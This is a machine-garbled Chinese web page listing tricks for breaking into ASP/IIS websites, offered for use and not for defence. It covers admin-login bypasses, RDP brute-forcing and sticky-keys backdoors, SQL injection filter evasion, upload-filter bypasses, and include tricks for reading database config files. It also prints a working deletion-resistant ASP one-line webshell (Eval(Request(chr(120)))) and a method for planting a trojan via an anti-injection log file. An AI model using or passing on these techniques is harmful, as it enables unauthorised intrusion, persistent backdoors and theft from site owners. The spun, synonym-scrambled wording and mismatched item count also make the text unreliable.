总计16种网站渗透技巧经验分享

1.行使网站过滤不严直接绕过后台验证,在网站背后加上 admin/session.asp 或
admin/left.asp

2.有的网站进后台相会世一个剧本指示框,输入:administrator
即可突破!因为admin代表以管理人身份进入的意味。

3.有的网站开了3389,入侵在此之前先去老是3389,尝试弱口令或是爆破,再者就是按5次shift键,看看有没前人装过后门,然后再社工密码。

4.有时候进后台会弹出指示框“请登陆”,把地址抄写出来(复制不了),然后放在网页源代码分析器里,采取浏览器-拦截跳转勾选–查看即可进入后台!

5.突破防盗链访问webshell,代码:javascript:document.write(“<a
href=’http://www.xxx.com/uploadfile/1.asp’&gt;fuck&lt;/a&gt;”)
 回车后点击GO即可进入webshell

6.突破一流音讯监控拦截系统访问,当小马可以访问,上传大马却卓殊的时候,可以先用马来亚跟一张图纸合并,在上传合并后的图片,接着数据库备份后走访即可!

7.在拿编辑器的shell时,有时扩大了asp|asa|cer|php|aspx等扩张名上传时都被过滤了,其实只要扩张aaspsp
上传asp就会突破了。

8.有时候啊D猜出表段了,不过猜不到字段的时候,可以到后台查看源文件,搜索ID或type,一般都能找到,再到啊D里添加字段展开猜解内容即可突破。

9.社工后台密码可以用这多少个技术,假设网站域名是:www.baidu.com
管理员名称为admin,可以试行密码“baidu”和“baidu.com”来登陆。

10.手工流入时一旦网站过滤了 and 1=1   and 1=2 ,可以用xor 1=1   xor 1=2
举办判断。

11.当地构造上传一句话木马,假如提醒“请先采纳你要上传的文件![ 重新上传
]”
,表达文件太小了,用记事本打开再复制多几句话从而扩张文件大小,再上传即可。

12.用啊d跑表,跑字段名name和pass出不来,显示长度超过50咋样的,猜解不出的场所下,这时放在穿山甲去跑一般都能跑出来!

13.猜社团者后台小技巧,admin/left.asp、admin/main.asp、admin/top.asp、admin/admin.asp
会现出菜单导航,然后迅雷下载全体链接。

14.清楚表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句:Insert
into admin(user,pwd) values(‘test’,’test’)

15.当赢得管理员密码,却拿不到管理员的帐号时,到前台随便打开一个音信,找找诸如“提交者”“发布者”之类的字眼,一般“提交者”就是社团者的帐号了。

16.爆破ASP+IIS架设的网站web相对路径,假诺网站主页为:http://www.xxxxx/index.asp/
提交http://www.xxxxx.cn/fkbhvv.aspx/,fkbhvv.aspx是不存在的。

17.源码的行使,很多网站用的都是网上下载的源码,有的站长很懒,什么也不改,然后就上传开通网站了,大家得以去下载一套,里面有诸多默认的信息值得利用。

18.把以下代码上传到webshell里,后缀是asp,即便旁人发现了也删除不了,算是顶尖防删的一句话木马了,可以很安全的留个后门,菜刀连接密码:x

 

        

<%Eval(Request(chr(120))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if  f.attributes <> 39 then:f.attributes = 39:end if%>

  

19.当破解出帐号密码却找不到后台的时候,可以尝尝链接ftp,假设域名是:www.baidu.com
“ 得到的密码为“bishi”,大家就足以试下用“xxxx”“xxxx.cn”www.xxxx.cn作为FTP
用户名,用“bishi”:作为FTP密码来拓展登陆,成功的几率得以很大的啊!ftp的默认端口:21
 默认帐号密码:test

20.有的后台不显得验证码,难道就没法登录了么?
其实把一段代码导入注册表里就可以突破那多少个困境了,把下部的代码保存为Code.reg,双击导入就能够了!

 

      

REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000

  

21.当网站不同意上传
asp、asa、php等文件时,我们可以上传一个stm文件,代码为“<!–#include
file=”conn.asp”–>”
 
(想查看什么文件就写什么文件名,那里自己倘诺想查看“conn.asp”),然后径直打开这么些stm文件的地址,再查看源代码,“conn.asp”那一个文件的代码就分明了!

22.当网站不允许上传ASP,CGI,CER,CDX,HTR等项目标文书时,尝试上传一个shtm文件,内容为:<!–#includ
file=”conn.asp”–>
固然上传成功,这太好了,访问地址就足以浏览conn.asp里的内容了,这样一来,数据库路径也就到手啊!

23.手工检测注入点弹出“你的操作已被记录!”之类的信息,访问这多少个文件:sqlin.asp,倘使存在,在注入点前边植入一句话木马:‘excute(request(“TNT”))
随后用一句话木马客户端连接:http://www.xxx.com/sqlin.asp,上传木马即可拿下shell,因为很多防注入程序都是用”sqlin.asp“这个文件名来做非法记录的数据库。

24.旁注的话,肯定是挑补助aspx的站点来日了,问题是怎么判断呢?方法很粗略,在在网站背后加上xxx.aspx,如若回去“/”应用程序中的服务器错误,不能找到该资源,404镜头就申明辅助aspx木马。

25.网站前边加test.php 可以查阅版本

26.禁忌这六个网站后台文件 admin_index.asp  manage_login.asp

相关文章